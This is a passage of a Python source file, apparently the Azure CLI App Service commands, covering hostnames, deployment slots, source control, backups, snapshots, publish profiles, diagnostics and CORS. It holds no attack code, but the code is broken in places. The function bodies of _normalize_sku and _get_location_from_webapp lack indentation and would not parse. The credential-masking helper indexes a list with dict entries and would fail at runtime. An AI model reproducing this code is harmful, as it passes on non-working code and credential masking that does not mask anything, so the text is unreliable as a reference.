    delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
    """Show container-related settings, with credentials masked."""
    app_settings = get_app_settings(cmd, resource_group_name, name, slot)
    filtered = _filter_for_container_settings(cmd, resource_group_name, name, app_settings,
                                              show_multicontainer_config, slot)
    return _mask_creds_related_appsettings(filtered)
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
    """Function-app variant of show_container_settings (no multicontainer config)."""
    return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
                                   show_multicontainer_config=None, slot=None):
    """Keep only container-related settings and surface the fx version (plus,
    optionally, its decoded multicontainer config) as extra entries."""
    filtered = [entry for entry in settings if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
    if fx_version:
        filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                         'value': fx_version})
        if show_multicontainer_config:
            decoded = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
            filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
                             'value': decoded})
    return filtered
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Null out credential-bearing entries (see APPSETTINGS_TO_MASK) in place."""
    for key in [entry for entry in settings if entry in APPSETTINGS_TO_MASK]:
        settings[key] = None
    return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Bind a custom hostname to a web app (or slot)."""
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
    if slot is None:
        return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name,
                                                                  hostname, binding)
    return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name,
                                                                   hostname, binding, slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Remove a hostname binding from a web app (or slot)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
    # note: the slot API takes (group, name, slot, hostname) -- slot before hostname
    return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
    """List hostname bindings, trimming names to the bare hostname."""
    bindings = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        # names come back as 'site/hostname'; keep only the hostname part
        binding.name = binding.name.split('/')[-1]
    return bindings
def get_external_ip(cmd, resource_group_name, webapp_name):
    """Return the app's inbound IP address as {'ip': ...}.

    For apps inside an App Service Environment the VIP is taken from the ASE;
    otherwise the default hostname is resolved through DNS.
    """
    # logics here are ported from portal
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    if webapp.hosting_environment_profile:
        address = client.app_service_environments.list_vips(
            resource_group_name, webapp.hosting_environment_profile.name)
        if address.internal_ip_address:
            ip_address = address.internal_ip_address
        else:
            # an IP-based SSL binding gets its own dedicated virtual IP
            vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
            ip_address = vip.virtual_ip if vip else address.service_ip_address
    else:
        ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
    return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
    """Resolve *hostname* to an IPv4 address string via DNS."""
    import socket
    return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot, optionally cloning configuration, app settings
    and connection strings from another slot.

    When *configuration_source* equals the webapp name, the production slot is
    used as the clone source; slot-sticky settings are never propagated.
    """
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    clone_from_prod = None
    slot_def.site_config = SiteConfig()
    poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        # None as the source slot means "production"
        clone_from_prod = configuration_source.lower() == webapp.lower()
        site_config = get_site_configs(cmd, resource_group_name, webapp,
                                       None if clone_from_prod else configuration_source)
        _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_configuration', slot, site_config)
    # slot create doesn't clone over the app-settings and connection-strings, so we do it here
    # also make sure slot settings don't get propagated.
    if configuration_source:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                               'list_application_settings',
                                               src_slot)
        for a in slot_cfg_names.app_setting_names or []:
            app_settings.properties.pop(a, None)
        connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                                     'list_connection_strings',
                                                     src_slot)
        for a in slot_cfg_names.connection_string_names or []:
            connection_strings.properties.pop(a, None)
        _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                    'update_application_settings',
                                    app_settings.properties, slot, client)
        _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                    'update_connection_strings',
                                    connection_strings.properties, slot, client)
    # names come back as 'site/slot'; keep only the slot part
    result.name = result.name.split('/')[-1]
    return result
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, cd_app_type=None,
                          app_working_dir=None, nodejs_task_runner=None, python_framework=None,
                          python_version=None, cd_account_create=None, cd_project_url=None, test=None,
                          slot_swap=None, private_repo_username=None, private_repo_password=None):
    """Hook the app up to source control.

    Two modes:
      * VSTS continuous delivery when cd_project_url is given (delegated to
        VstsContinuousDeliveryProvider);
      * plain Kudu/site source control (GitHub, external git, Mercurial)
        otherwise, with retries because the SCM site may still be restarting.
    """
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    if cd_project_url:
        # Add default values
        cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
        python_framework = 'Django' if python_framework is None else python_framework
        python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(resource_group_name)
        vsts_provider = VstsContinuousDeliveryProvider()
        cd_app_type_details = {
            'cd_app_type': cd_app_type,
            'app_working_dir': app_working_dir,
            'nodejs_task_runner': nodejs_task_runner,
            'python_framework': python_framework,
            'python_version': python_version
        }
        try:
            status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
                                                             branch, git_token, slot_swap, cd_app_type_details,
                                                             cd_project_url, cd_account_create, location, test,
                                                             private_repo_username, private_repo_password, webapp_list)
        except RuntimeError as ex:
            raise CLIError(ex)
        logger.warning(status.status_message)
        return status
    else:
        # the VSTS-only options are meaningless in this mode; reject them early
        non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
                           python_version, cd_account_create, test, slot_swap]
        if any(non_vsts_params):
            raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
                           'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
                           'python_version, cd_account_create, test, slot_swap')
        from azure.mgmt.web.models import SiteSourceControl, SourceControl
        if git_token:
            # cache the GitHub token at the subscription level so Kudu can use it
            sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
            client.update_source_control('GitHub', sc)
        source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
                                           is_manual_integration=manual_integration,
                                           is_mercurial=(repository_type != 'git'))
        # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
        for i in range(5):
            try:
                poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                 'create_or_update_source_control',
                                                 slot, source_control)
                return LongRunningOperation(cmd.cli_ctx)(poller)
            except Exception as ex:  # pylint: disable=broad-except
                import re
                ex = ex_handler_factory(no_throw=True)(ex)
                # for non server errors(50x), just throw; otherwise retry 4 times
                if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                    raise
                logger.warning('retrying %s/4', i + 1)
                time.sleep(5)   # retry in a moment
def update_git_token(cmd, git_token=None):
    '''
    Update source control token cached in Azure app service. If no token is provided,
    the command will clean up existing token.
    '''
    from azure.mgmt.web.models import SourceControl
    client = web_client_factory(cmd.cli_ctx)
    # an empty token clears the cached credential
    sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
    return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
    """Show the source-control configuration of a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
    """Remove the source-control configuration of a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
    """Switch the app to local-git deployment and return the git clone URL."""
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    site_config = SiteConfigResource(location=location)
    site_config.scm_type = 'LocalGit'
    if slot is None:
        client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
    else:
        client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
                                                            site_config, slot)
    return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
    """Trigger a source-control sync for the site.

    The SDK mistakenly raises CloudError on HTTP 200/204, so those statuses
    are swallowed here.
    """
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:  # Because of bad spec, sdk throws on 200. We capture it here
        if ex.status_code not in [200, 204]:
            # bare `raise` preserves the original traceback (was `raise ex`)
            raise
def list_app_service_plans(cmd, resource_group_name=None):
    """List app service plans in the subscription or a single resource group."""
    client = web_client_factory(cmd.cli_ctx)
    source = (client.app_service_plans.list() if resource_group_name is None
              else client.app_service_plans.list_by_resource_group(resource_group_name))
    plans = list(source)
    for plan in plans:
        # prune a few useless fields
        del plan.geo_region
        del plan.subscription
    return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, sku='B1', number_of_workers=None,
                            location=None, tags=None):
    """Create (or update) an app service plan.

    Linux and Hyper-V (Windows container) plans are mutually exclusive; the
    location defaults to the resource group's location.
    """
    if is_linux and hyper_v:
        raise CLIError('usage error: --is-linux | --hyper-v')
    client = web_client_factory(cmd.cli_ctx)
    sku = _normalize_sku(sku)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name)
    return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
                            admin_site_name=None):
    """Patch sku tier/name, worker count and admin site on an AppServicePlan.

    Only arguments that are not None are applied; *instance* is mutated and
    returned (generic-update pattern).
    """
    sku_def = instance.sku
    if sku is not None:
        sku = _normalize_sku(sku)
        sku_def.tier = get_sku_name(sku)
        sku_def.name = sku
    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    # the original assigned instance.sku twice; the duplicate was removed
    instance.sku = sku_def
    if admin_site_name is not None:
        instance.admin_site_name = admin_site_name
    return instance
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Show the backup schedule; raise a friendly error when none is configured."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List the backups of a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
                                   slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup into the given storage container."""
    client = web_client_factory(cmd.cli_ctx)
    # the service appends '.zip' itself; drop a user-supplied extension
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    db_setting = _create_db_setting(db_name, db_type, db_connection_string)
    backup_request = BackupRequest(backup_request_name=backup_name,
                                   storage_account_url=storage_account_url, databases=db_setting)
    if slot:
        return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
    return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the scheduled-backup configuration.

    When no configuration exists yet, storage_account_url, frequency,
    retention_period_in_days and keep_at_least_one_backup are all required;
    otherwise, arguments left unspecified keep their current values.
    """
    configuration = None
    # the service appends '.zip' itself; drop a user-supplied extension
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    if not backup_name:
        from datetime import datetime
        backup_name = '{0}_{1}'.format(webapp_name, datetime.utcnow().strftime('%Y%m%d%H%M'))
    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except DefaultErrorResponseException:
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')
    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # the CLI passes the flag through as a string; normalize to bool
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    if configuration and configuration.databases:
        # carry over existing database settings unless explicitly overridden
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(db_name, db_type, db_connection_string)
    backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a web app (or slot) from a backup blob in the given storage container."""
    client = web_client_factory(cmd.cli_ctx)
    # Kudu stores backups as zip archives; make sure the blob name carries the extension.
    blob = backup_name if backup_name.lower().endswith('.zip') else backup_name + '.zip'
    request = RestoreRequest(storage_account_url=storage_account_url,
                             blob_name=blob, overwrite=overwrite,
                             site_name=target_name,
                             databases=_create_db_setting(db_name, db_type, db_connection_string),
                             ignore_conflicting_host_names=ignore_hostname_conflict)
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List the restorable snapshots of a web app (or one of its slots)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'list_snapshots', slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False,  # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore an app from a snapshot — either its own or another app's."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    source_args = [source_resource_group, source_name]
    if any(source_args) and not all(source_args):
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    if all(source_args):
        # Cross-app restore: build the ARM resource id of the source site/slot.
        source_id = "/subscriptions/" + get_subscription_id(cmd.cli_ctx) + \
                    "/resourceGroups/" + source_resource_group + \
                    "/providers/Microsoft.Web/sites/" + source_name
        if source_slot:
            source_id = source_id + "/slots/" + source_slot
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time,
                                         recovery_source=SnapshotRecoverySource(id=source_id),
                                         recover_configuration=recover_config)
    else:
        # Overwrite app with its own snapshot.
        request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time,
                                         recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
    """Build the one-element database-settings list, or None when no db args are given."""
    db_args = (db_name, db_type, db_connection_string)
    if all(db_args):
        return [DatabaseBackupSetting(database_type=db_type, name=db_name,
                                      connection_string=db_connection_string)]
    if any(db_args):
        # Partial specification is ambiguous — require all three or none.
        raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
    """Parse a backup frequency string such as '7d' or '12h'.

    :param frequency: count followed by a unit suffix — 'd' for days, 'h' for hours.
    :return: (frequency_num, frequency_unit) with the unit as a FrequencyUnit member.
    :raises CLIError: on an unknown suffix, a non-numeric count, or a non-positive count.
    """
    unit_part = frequency.lower()[-1]
    if unit_part == 'd':
        frequency_unit = FrequencyUnit.day
    elif unit_part == 'h':
        frequency_unit = FrequencyUnit.hour
    else:
        raise CLIError('Frequency must end with d or h for "day" or "hour"')
    try:
        frequency_num = int(frequency[:-1])
    except ValueError:
        raise CLIError('Frequency must start with a number')
    # A zero-interval schedule is meaningless; enforce strictly positive so the
    # error message ("must be positive") matches the actual check (was '< 0',
    # which let 0 through).
    if frequency_num <= 0:
        raise CLIError('Frequency must be positive')
    return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_location_from_resource_group(cli_ctx, resource_group_name):
    """Return the Azure region of the given resource group."""
    from azure.mgmt.resource import ResourceManagementClient
    rg_client = get_mgmt_service_client(cli_ctx, ResourceManagementClient)
    return rg_client.resource_groups.get(resource_group_name).location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Compose the authenticated local-git clone URL for an app."""
    user = client.get_publishing_user()
    source_control = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
    repo_parts = urlparse(source_control.repo_url)
    return '{}://{}@{}/{}.git'.format(repo_parts.scheme, user.publishing_user_name,
                                      repo_parts.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https Kudu (SCM) endpoint of an app."""
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
    repo_host = next((h for h in (webapp.host_name_ssl_states or [])
                      if h.host_type == HostType.repository), None)
    if repo_host is None:
        # this should not happen, but throw anyway
        raise ValueError('Failed to retrieve Scm Uri')
    return "https://{}".format(repo_host.name)
def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    client = web_client_factory(cmd.cli_ctx)
    user = User(publishing_user_name=user_name)
    if password is None:
        # Prompt interactively when the password was not supplied on the command line.
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user.publishing_password = password
    return client.update_publishing_user(user)
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
    """Return the app's publishing profiles as a list of plain dicts.

    The secrets-bearing publish-settings XML returned by the service is
    parsed and each profile's XML attributes are exposed as ordinary keys
    (leading '@' removed).
    """
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot)
    full_xml = ''.join(f.decode() for f in content)
    profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
    # xmltodict returns a single dict (not a list) when the XML contains exactly
    # one publishProfile element; normalize so the loop below always sees dicts
    # instead of iterating over that dict's keys.
    if not isinstance(profiles, list):
        profiles = [profiles]
    converted = []
    for profile in profiles:
        new = {}
        for key in profile:
            # strip the leading '@' xmltodict put in for attributes
            new[key.lstrip('@')] = profile[key]
        converted.append(new)
    return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Toggle the DOCKER_ENABLE_CI app setting and report the resulting CD webhook URL."""
    update_app_settings(cmd, resource_group_name, name, ["DOCKER_ENABLE_CI=" + enable], slot)
    return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    """Report whether container CI is enabled and, if so, the docker webhook URL."""
    app_settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = any(s['name'] == 'DOCKER_ENABLE_CI' and s['value'] == 'true'
                         for s in app_settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if docker_enabled:
        # Build the webhook URL from the MSDeploy publishing profile's credentials.
        for profile in list_publish_profiles(cmd, resource_group_name, name, slot):
            if profile['publishMethod'] == 'MSDeploy':
                scmUrl = profile['publishUrl'].replace(":443", "")
                cd_settings['CI_CD_URL'] = ('https://' + profile['userName'] + ':' +
                                            profile['userPWD'] + '@' + scmUrl + '/docker/hook')
                break
    else:
        cd_settings['CI_CD_URL'] = ''
    return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the app's URL in the default browser; optionally tail the log stream."""
    open_page_in_browser(_get_url(cmd, resource_group_name, name, slot))
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
    """Return the browsable URL of an app, preferring https when any SSL binding exists."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    # picks the custom domain URL incase a domain is assigned
    host = site.enabled_host_names[0]
    has_ssl = any(h.ssl_state != SslState.disabled for h in site.host_name_ssl_states)
    return ('https' if has_ssl else 'http') + '://' + host
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure the app's diagnostic logging.

    Four independent categories can be set: application logs, web-server/HTTP
    logs, detailed error messages and failed-request tracing. A category whose
    flag is left as None is not touched (its config object stays None, which
    the service interprets as "no change").
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location
    application_logs = None
    if application_logging is not None:
        if not application_logging:
            # Disabling application logging overrides any requested level.
            level = 'Off'
        elif level is None:
            # Default verbosity when enabling without an explicit level.
            level = 'Error'
        fs_log = FileSystemApplicationLogsConfig(level=level)
        application_logs = ApplicationLogsConfig(file_system=fs_log)
    http_logs = None
    # Web-server and docker-container logging are the same HTTP-logs switch.
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Return the current diagnostic-logs configuration of an app (or slot)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable (default target: production) or disable auto-swap on a deployment slot."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        site_config.auto_swap_slot_name = ''
    else:
        site_config.auto_swap_slot_name = auto_swap_slot or 'production'
    return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
    """List an app's deployment slots with short names and the owning plan's name."""
    client = web_client_factory(cmd.cli_ctx)
    result = []
    for slot in client.web_apps.list_slots(resource_group_name, webapp):
        # Slot names come back as 'app/slot'; keep only the slot part.
        slot.name = slot.name.split('/')[-1]
        setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
        del slot.server_farm_id
        result.append(slot)
    return result
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
    """Swap, preview-swap, or reset deployment slots (target defaults to production)."""
    client = web_client_factory(cmd.cli_ctx)
    if action == 'swap':
        return client.web_apps.swap_slot_slot(resource_group_name, webapp,
                                              slot, (target_slot or 'production'), True)
    if action == 'preview':
        # Apply the source slot's config to the target without swapping traffic.
        if target_slot is None:
            return client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                   webapp, slot, True)
        return client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                             slot, target_slot, True)
    # reset: we will reset both source slot and target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete a deployment slot."""
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    web_client_factory(cmd.cli_ctx).web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Route percentages of production traffic to slots ('slot=percentage' entries)."""
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # Every slot shares the app's DNS suffix (everything after the first dot).
    host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
    rules = []
    for entry in distribution:
        slot, percentage = entry.split('=')
        rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
                                reroute_percentage=float(percentage),
                                name=slot))
    configs.experiments.ramp_up_rules = rules
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
    return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
    """Show the current slot traffic ramp-up rules."""
    return get_site_configs(cmd, resource_group_name, name).experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all slot traffic routing rules by setting an empty distribution."""
    set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the app's CORS allow-list and return the updated settings."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    existing = configs.cors.allowed_origins or []
    configs.cors.allowed_origins = existing + allowed_origins
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove the given origins from the CORS allow-list (all origins when none given)."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if allowed_origins:
            remaining = [o for o in (configs.cors.allowed_origins or []) if o not in allowed_origins]
        else:
            remaining = []
        configs.cors.allowed_origins = remaining
